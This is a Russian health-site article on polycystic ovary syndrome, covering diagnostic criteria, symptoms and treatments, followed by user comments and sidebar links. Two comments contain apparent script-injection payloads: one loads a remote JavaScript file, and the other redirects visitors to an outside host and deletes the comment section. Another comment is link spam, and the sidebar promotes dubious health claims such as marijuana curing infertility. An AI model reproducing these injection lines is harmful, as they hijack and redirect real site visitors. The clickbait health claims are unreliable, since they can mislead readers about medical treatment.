Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Менструальные болезни. По...  >>  Менструальные болезни. Поликистоз яичников
 
Обратная связь
 

Менструальные болезни. Поликистоз яичников

Размер шрифта
18 июня 2014 00:00
  • google_analytics: false
  • Нравится

Вы когда-нибудь задумывались, почему гинеколог всегда что-то записывает и уточняет практически любое замечание? В цикле наших статей мы расскажем о самых распространенных менструальных расстройствах.

Менструальные болезни. Поликистоз яичников

Синдром поликистозных яичников (СПКЯ) – это расстройство, при котором яичники производят чрезмерное количество мужских гормонов андрогенов (гиперандрогения) и появляются небольшие кисты. Критерии, необходимые для постановки диагноза СПКЯ, были предметом жарких споров на протяжении многих лет.

В 2003 году группа европейских и американских исследователей и врачей пересмотрела диагностические критерии, и пришла к выводу, что для постановки диагноза у женщины должны наличествовать два из следующих критериев:

  • Клинические или биохимические признаки гиперандрогении
  • Отклонения в менструальном цикле из-за олиго- или ановуляторных циклов
  • Поликистоз яичников, проявляющийся на УЗИ

Клинически СПКЯ проявляется как:

  • Уменьшение менструации или их прекращение (олиго- или аменорея)
  • Гирсутизм (избыточное оволосение по мужскому типу)
  • Облысение по мужскому типу
  • Акне
  • Бесплодие
  • Инсулинорезистентность
  • Ожирение

Диагностика

Гирсутизм, облысение по мужскому типу и акне – клинические признаки гиперандрогении; однако другие причины должны быть исключены до постановки диагноза.

Нарушения менструального цикла при СПКЯ обычно начинаются по достижению половой зрелости. Женщины с синдромом поликистозных яичников должны быть обследованы на нарушение толерантности к глюкозе и сахарному диабету 2 типа, потому что он чаще всего связан с резистентностью к инсулину.

Лечение

Лечение СПКЯ зависит от симптомов. От гирсутизма, как правило, избавляются при помощи лазерной эпиляции, электролиза, эпиляции и стандартных средств для удаления волос или бритья.

Пероральные контрацептивы могут использоваться для уменьшения акне и замедления роста волос, а также для предотвращения гиперплазии эндометрия у женщин без менструаций. Лечение диабета типа 2 у больных СПКЯ аналогично стандартному лечению данного заболевания.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 июня 2014 в 15:08

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

24 марта 2016 в 18:13

Цитировать   |   Пожаловаться

У моей сёстры был синдром поликистозных яичников, не могла забеременеть примерно 2 года, потому что лечилась долго, да ещё и в частной клинике. Но сейчас имеет двойняшек здоровых) и лечение не дало последствий) если Вам интересна тема синдрома поликистозных яичников рекомендую почитать полезную статью на http://spkya.ру

Статьи

       
Ученые обнаружили причину самого частого женского заболевания   Марихуана – лучшее средство для бесплодия!   В новый год – с новым весом!   Чем запивать водку, чтобы не было цирроза?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 

Слайдшоу

1
Проблемы с внешностью или болезнь?
Как прекратить боль во время месячных?
Все о самой женской болезни. Эндометриоз

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.